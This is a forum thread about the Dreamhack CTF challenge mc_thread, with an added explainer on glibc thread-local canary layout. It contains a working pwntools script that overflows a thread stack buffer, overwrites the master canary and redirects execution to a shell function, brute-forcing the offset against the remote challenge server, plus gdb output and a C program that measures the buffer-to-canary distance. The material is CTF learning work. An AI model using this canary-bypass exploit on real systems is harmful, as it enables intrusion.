Do I need to fuzz?
The exploit (the one Dreamhack shows on the exploit tech page) works perfectly on local, but on remote it doesn't work... I tried to bruteforce the distance between the payload and the master canary. Here is my script:
```python
from pwn import *

context.log_level = 'debug'
elf = ELF('./mc_thread')                   # load the binary once, not on every iteration

for i in range(400, 9000, 8):
    p = remote("host3.dreamhack.games", 17226)
    payload = b'A' * 264
    payload += b'A' * 8                    # canary
    payload += b'B' * 8                    # saved rbp
    payload += p64(elf.symbols['giveshell'])
    payload += b'C' * (i - len(payload))   # pad up to the guessed canary offset
    payload += p64(0x404800 - 0x972)
    payload += b'C' * 0x10
    payload += p64(0x4141414141414141)     # same bytes as the 'A' * 8 canary field above
    inp_sz = len(payload) // 8
    p.sendlineafter(b'Size: ', str(inp_sz).encode())
    p.sendafter(b'Data: ', payload)
    p.sendline(b"cat flag")                # bytes, not str, for Python 3 pwntools
    data = p.recvallS(timeout=3)
    p.close()                              # don't leak a socket per guess
    if "DH{" in data:
        print(data)
        break
```
Is this overkill, and can I work out the distance that exists on remote? Or do I really need to bruteforce? Thanks in advance
#system_hacking
#master_canary
#mc_thread
Answers: 2
wyv3rn
Chairman of the No-Reply Prevention Committee
As you know, the offset can change depending on the environment, so I think brute-forcing (BF) is necessary.
FRACCHETTO
No featured achievements
If run in the Dockerfile the distance is kinda large, but the steps are also the ones shown on the exploit tech page...
```
(gdb) x/x $rbp-0x110
0x7ffff7d8bd40: 0x0000000000000000
(gdb) x/gx $fs_base+0x28
0x7ffff7d8c668: 0x8d3bade0f4598900
(gdb) p/x ($fs_base + 0x28) - 0x7ffff7d7dd40
$1 = 0xe928
```
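The number both answers are talking about is the gap between a frame on the thread's stack and the canary copy that glibc keeps at `fs:0x28` in the thread's TCB. glibc carves the thread stack, the static TLS blocks and the TCB out of one mmap region, so the gap is stable on a given machine (which is why a single gdb measurement works locally) but moves with the glibc build, the size of static TLS and the thread stack size, which is why it has to be re-measured or searched on remote. The program below, added here as an illustration and not part of the post or the challenge, measures that gap in-process. It assumes x86-64 Linux with glibc, where the first word of the TCB points to itself so `fs:0` yields what gdb shows as `$fs_base`; the names `measure_distance` and `worker` are mine.

```c
// Added example: measure the distance from a thread's stack buffer to the
// stack-canary copy glibc keeps at fs:0x28 (x86-64 Linux/glibc only).
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

// glibc's x86-64 TCB stores a pointer to itself in its first word, so
// reading fs:0 gives the TLS base; gdb prints the same value as $fs_base.
static uintptr_t tls_base(void) {
    uintptr_t base;
    __asm__ volatile("mov %%fs:0, %0" : "=r"(base));
    return base;
}

struct measurement {
    uintptr_t buf_addr;      // address of a local buffer on the thread stack
    uintptr_t canary_addr;   // address of the canary copy: tls_base + 0x28
};

static void *worker(void *arg) {
    struct measurement *m = arg;
    volatile char buf[256];  // stands in for the vulnerable frame's buffer
    buf[0] = 0;
    m->buf_addr = (uintptr_t)buf;
    m->canary_addr = tls_base() + 0x28;
    return NULL;
}

// Runs worker() on a fresh thread with the requested stack size (0 = default)
// and returns canary_addr - buf_addr in bytes, or 0 on any failure.
uintptr_t measure_distance(size_t stack_size) {
    pthread_attr_t attr;
    pthread_t tid;
    struct measurement m = {0, 0};
    if (pthread_attr_init(&attr) != 0) return 0;
    if (stack_size != 0 && pthread_attr_setstacksize(&attr, stack_size) != 0) {
        pthread_attr_destroy(&attr);
        return 0;
    }
    if (pthread_create(&tid, &attr, worker, &m) != 0) {
        pthread_attr_destroy(&attr);
        return 0;
    }
    pthread_join(tid, NULL);
    pthread_attr_destroy(&attr);
    // The TCB sits at the top of the thread's mapping, above the stack.
    if (m.canary_addr <= m.buf_addr) return 0;
    return m.canary_addr - m.buf_addr;
}

int main(void) {
    // Stack sizes chosen for illustration; the default is usually 8 MiB.
    size_t sizes[] = {0, 1u << 20, 1u << 24};
    for (size_t k = 0; k < sizeof(sizes) / sizeof(sizes[0]); k++) {
        uintptr_t d = measure_distance(sizes[k]);
        printf("stack size %zu: buffer -> canary copy = 0x%lx bytes\n",
               sizes[k], (unsigned long)d);
    }
    return 0;
}
```

Run it twice on the same box and the numbers repeat; run it inside the challenge's Docker image and they differ, matching the second answer's observation that the gdb result depends on where it was measured.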